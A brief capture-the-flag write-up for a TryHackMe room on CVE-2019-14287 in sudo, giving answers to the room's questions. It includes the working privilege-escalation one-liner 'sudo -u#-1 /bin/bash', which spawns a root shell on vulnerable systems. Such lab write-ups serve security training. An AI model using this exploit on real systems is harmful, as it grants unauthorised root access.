- Name: Sudo Security Bypass
- Profile: tryhackme.com
- Difficulty: Easy
- Description: A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series
What command are you allowed to run with sudo?
To see which command we can run as which user:
tryhackme@sudo-privesc:~$ sudo -ll
What is the flag in /root/root.txt?
We can exploit CVE-2019-14287 as explained in the course material.
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash